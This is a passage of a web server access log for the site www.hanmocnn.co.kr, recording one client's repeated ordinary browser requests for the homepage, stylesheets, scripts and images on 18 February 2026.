5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:31:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:24 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:20:34:25 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:33:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:34:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 